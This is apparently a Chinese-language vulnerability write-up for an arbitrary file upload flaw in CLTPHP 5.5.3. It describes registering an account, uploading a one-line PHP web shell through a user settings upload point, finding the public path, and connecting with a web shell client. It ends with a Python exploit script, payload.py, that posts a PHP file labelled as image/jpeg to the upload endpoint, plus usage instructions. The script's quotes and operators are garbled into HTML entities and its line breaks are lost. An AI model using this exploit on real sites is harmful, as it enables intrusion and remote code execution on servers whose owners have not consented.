CLTPHP5.5.3任意文件上传漏洞

CLTPHP采用ThinkPHP开发&＃xff0c;后台采用Layui框架的内容管理系统。

CLTPHP 5.5.3

找到一个注册界面

随便注册一个用户&＃xff0c;登陆后在设置里找到一个上传点

上传我们的一句话木马

查看返回包&＃xff0c;上传成功

访问失败&＃xff0c;猜测返回路径可能不是绝对路径

通过报错信息查找关键词&＃xff0c;发现存在public目录 那再把public加上再试试~ success&＃xff01;

菜刀连接

payload.py

#!/usr/bin/python
#-*- coding: UTF-8 -*-
#Author&＃xff1a;Bypass
#Date&＃xff1a;2018.03.01
import requests
import sysdef CLPHP_upload(url):header &＃61; { &＃39;User-Agent&＃39; : &＃39;Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)&＃39; ,&＃39;X-Requested-With&＃39;: &＃39;XMLHttpRequest&＃39;,} geturl &＃61; url&＃43;"/user/upFiles/upload"files &＃61;{&＃39;file&＃39;:(&＃39;1.php&＃39;,open(&＃39;1.php&＃39;,&＃39;rb&＃39;),&＃39;image/jpeg&＃39;)}res &＃61; requests.post(geturl, files&＃61;files,headers&＃61;header)print res.textif __name__ &＃61;&＃61; "__main__":if len(sys.argv) &＃61;&＃61; 2:url&＃61;sys.argv[1]CLPHP_upload(url)sys.exit(0)else:print ("usage: %s xxx.com " % sys.argv[0])sys.exit(-1)


使用方法

把payload.py和一句话.php放到同一文件夹下

cmd执行 python payload.py www.0-sec.org

https://www.cnblogs.com/unixcs/p/11244463.html